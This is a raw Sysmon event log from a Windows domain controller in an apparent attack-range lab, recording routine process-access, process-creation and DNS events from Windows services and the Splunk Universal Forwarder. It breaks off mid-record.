10341000x80000000000000006333Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:12.391{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE8-5FA1-5C01-000000008801}5052C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006332Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:12.391{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006331Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:12.391{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006330Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:12.391{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006329Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:12.391{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006328Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:12.391{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006327Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:12.391{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006326Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:12.391{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006325Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:12.391{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006324Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:12.391{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006323Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:12.391{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CE8-5FA1-5C01-000000008801}5052C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006322Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:12.391{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE8-5FA1-5C01-000000008801}5052C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006321Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:12.391{D28789B6-7CE8-5FA1-5C01-000000008801}5052C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000006320Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.174{D28789B6-7CE5-5FA1-5801-000000008801}2736win-dc-8070fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 10341000x80000000000000006361Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.877{D28789B6-7CE9-5FA1-5E01-000000008801}50644652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006360Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.736{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE9-5FA1-5E01-000000008801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006359Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.736{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006358Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.736{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006357Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.736{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006356Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.736{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006355Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.736{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006354Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.736{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006353Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.736{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006352Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.736{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006351Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.736{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006350Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.736{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CE9-5FA1-5E01-000000008801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006349Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.736{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE9-5FA1-5E01-000000008801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006348Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.737{D28789B6-7CE9-5FA1-5E01-000000008801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 